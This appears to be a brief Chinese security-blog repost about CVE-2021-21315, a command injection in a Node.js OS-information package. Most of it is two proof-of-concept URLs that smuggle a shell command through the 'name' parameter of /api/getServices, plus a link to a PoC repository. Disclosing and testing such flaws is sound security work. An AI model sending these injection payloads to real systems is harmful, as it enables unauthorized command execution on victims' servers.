CVE-2021-21315 Node.JS OS命令执行

文章来源:安全鸭

CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection

[PoC]

[Victim Site]/api/getServices?name=$(echo -e ‘Sekurak’ > pwn.txt)

[Victim Site]/api/getServices?name[]=$(echo -e ‘Sekurak’ > pwn.txt)

CVE-2021-21315 Node.JS OS命令执行

CVE-2021-21315 Node.JS OS命令执行

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容